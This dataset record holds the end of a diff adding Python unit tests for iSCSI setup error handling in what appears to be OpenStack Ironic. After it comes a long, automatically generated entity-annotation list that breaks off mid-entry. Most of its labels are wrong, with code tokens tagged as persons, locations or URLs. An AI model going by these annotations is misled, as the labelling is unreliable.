+@mock.patch.object(utils, 'delete_iscsi', lambda *_: None) +@mock.patch.object(utils, 'get_dev', lambda *_: '/dev/fake') +class ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase): + + def test_no_parent_device(self, mock_ibd): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + mock_ibd.return_value = False + expected_dev = '/dev/fake' + with testtools.ExpectedException(exception.InstanceDeployFailure): + with utils._iscsi_setup_and_handle_errors( + address, port, iqn, lun) as dev: + self.assertEqual(expected_dev, dev) + + mock_ibd.assert_called_once_with(expected_dev) + + def test_parent_device_yield(self, mock_ibd): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + expected_dev = '/dev/fake' + mock_ibd.return_value = True + with utils._iscsi_setup_and_handle_errors(address, port, + iqn, lun) as dev: + self.assertEqual(expected_dev, dev) + + mock_ibd.assert_called_once_with(expected_dev) +",75381,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2012'], ['DATE_TIME', '2011'], ['DATE_TIME', '2011'], ['PERSON', 'Ilya Alekseyev'], ['LOCATION', 'TestCase'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'mock.call.mkfs(dev=ephemeral_part'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 
'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['URL', 'mock.ca'], ['URL', 'mock.call.ma'], ['LOCATION', 'root_mb'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['NRP', 'lun'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_os.assert_called_once_with(check_dir'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_update'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['LOCATION', 'mock.call.work_on_disk(dev'], ['LOCATION', 'root_mb'], ['LOCATION', 'TestCase'], ['PERSON', 'fname'], ['URL', 'self.ad'], ['LOCATION', 'super(OtherFunctionTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['DATE_TIME', 'test_parse_root_device_hints(self'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(WorkOnDiskTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['URL', 'configdrive.re'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['LOCATION', 'self.root_mb'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(MakePartitionsTestCase'], ['LOCATION', 'self.root_mb'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'self.root_mb'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(DestroyMetaDataTestCase'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(GetDeviceBlockSizeTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'qemu_img_info'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'RealFilePartitioningTestCase(tests_base'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(RealFilePartitioningTestCase'], ['PERSON', 'self.file.close'], ['DATE_TIME', 'zip(part_table'], ['PERSON', 'Fedora'], ['DATE_TIME', 'Fedora 20'], ['LOCATION', 'self.assertEqual([6'], ['PERSON', 'autospec=True'], ['PERSON', 'utils.fetch_images(None'], ['PERSON', 'autospec=True'], ['LOCATION', 'utils.fetch_images'], ['PERSON', 'mock_cache'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'requests.si'], ['LOCATION', 'b64decode'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'VirtualMediaDeployUtilsTestCase(db_base'], ['LOCATION', 'TestCase'], ['PERSON', 
'autospec=True'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', ""IPMIFailure(cmd='a""], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', ""IPMIFailure(cmd='a""], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['NRP', 'node_set_boot_device_mock.side_effect'], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['PERSON', ""self.assertEqual('1""], ['LOCATION', 'test_get_clean_steps_missing_steps(self'], ['PERSON', 'autospec=True'], ['LOCATION', 'ISCSISetupAndHandleErrorsTestCase(tests_base'], ['LOCATION', 'TestCase'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.co'], ['URL', 'ironic.co'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.tests.co'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.de'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'mock.si'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'mock.as'], ['URL', 'mock.as'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 
'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'uuid.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.ma'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.call.mk'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.ge'], ['URL', 'size.ca'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'configdrive.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.call.de'], ['URL', 'mock.call.is'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.AN'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'gdi.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.is'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ve'], ['URL', 'self.as'], ['URL', 'exec.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.ch'], ['URL', 'self.as'], ['URL', 'os.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'utils.ch'], ['URL', 'os.as'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'utils.ve'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'utils.fo'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'exec.re'], ['URL', 'exec.as'], ['URL', 'verify.as'], ['URL', 'update.as'], ['URL', 'dev.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'disk.si'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], 
['URL', 'mock.ca'], ['URL', 'mock.call.de'], ['URL', 'self.as'], ['URL', 'utils.de'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'tempfile.mk'], ['URL', 'os.cl'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'cfg.CONF.se'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'f.re'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'time.sl'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'blk.re'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'blk.as'], ['URL', 'mock.pa'], ['URL', 'os.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.is'], ['URL', 'os.as'], ['URL', 'mock.ca'], ['URL', 'mock.pa'], ['URL', 'os.pa'], ['URL', 'mock.pa'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'getsize.re'], ['URL', 'csize.re'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'mock.pa'], ['URL', 'self.im'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.ad'], ['URL', 'self.mo'], ['URL', 'obj.st'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'ibd.re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'ibd.as'], ['URL', 'self.ro'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'self.ro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['URL', 'self.mo'], ['URL', 
'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'mp.re'], ['URL', 'self.mo'], ['URL', 'ibd.si'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.im'], ['URL', 'self.mo'], ['URL', 'mp.as'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'self.de'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'self.pa'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'self.pa'], ['URL', 'exc.re'], ['URL', 'utils.ma'], ['URL', 'self.de'], ['URL', 'self.ro'], ['URL', 'self.co'], ['URL', 'mock.ca'], ['URL', 'exc.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'gz.re'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'gz.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'exec.si'], ['URL', 'processutils.Pro'], ['URL', 'mock.ca'], ['URL', 'self.as'], ['URL', 'processutils.Pro'], ['URL', 'utils.de'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.as'], ['URL', 'self.as'], ['URL', 'gz.ca'], ['URL', 'mock.pa'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'exec.re'], ['URL', 'mock.ca'], ['URL', 'self.de'], ['URL', 'utils.ge'], ['URL', 'self.de'], ['URL', 'exec.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'dd.as'], ['URL', 'self.as'], ['URL', 'cg.ca'], ['URL', 'qinfo.re'], ['URL', 'mock.Pro'], ['URL', 'cg.as'], ['URL', 'self.as'], ['URL', 'dd.ca'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.sk'], ['URL', 'self.fi'], ['URL', 'tempfile.Na'], ['URL', 'self.file.cl'], ['URL', 'self.file.na'], ['URL', 'mock.pa'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.file.na'], ['URL', 'partitioner.li'], ['URL', 'self.file.na'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'mock.Ma'], ['URL', 'caches.as'], ['URL', 'image.as'], ['URL', 'mock.pa'], ['URL', 'exception.In'], ['URL', 'mock.Ma'], ['URL', 'caches.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'caches.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'self.as'], ['URL', 'requests.ca'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], ['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'requests.exceptions.Re'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'b64.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'b64.as'], ['URL', 'self.as'], ['URL', 'copy.ca'], ['URL', 'mock.pa'], ['URL', 'requests.re'], ['URL', 'mock.Ma'], ['URL', 'copy.si'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'requests.as'], ['URL', 'gzip.as'], ['URL', 'mock.AN'], ['URL', 'copy.as'], 
['URL', 'mock.AN'], ['URL', 'mock.AN'], ['URL', 'utils.mo'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'uuidutils.ge'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.as'], ['URL', 'self.no'], ['URL', 'utils.ge'], ['URL', 'self.co'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'exception.In'], ['URL', 'utils.pa'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.in'], ['URL', 'self.as'], ['URL', 'utils.is'], ['URL', 'self.no'], ['URL', 'self.node.pro'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'self.node.in'], ['URL', 'utils.ge'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.mo'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'self.node.pro'], ['URL', 'self.node.sa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.warning.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'mock.pa'], ['URL', 'exception.Il'], ['URL', 'mock.si'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.Il'], ['URL', 'utils.tr'], ['URL', 'mock.as'], ['URL', 'utils.mo'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['URL', 'self.node.id'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'task.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'self.cl'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'self.cl'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'self.as'], ['URL', 'exception.No'], ['URL', 'utils.ag'], ['URL', 'mock.as'], ['URL', 'mock.AN'], ['URL', 'task.no'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 'ironic.objects.Port.li'], ['URL', 'mock.pa'], ['URL', 'client.Ag'], ['URL', 'mock.re'], ['URL', 'mock.re'], ['URL', 'manager.ac'], ['URL', 'self.co'], ['URL', 'self.no'], ['URL', 'utils.ag'], ['URL', 'self.cl'], ['URL', 'self.as'], ['URL', 'states.CL'], ['URL', 'mock.pa'], ['URL', 
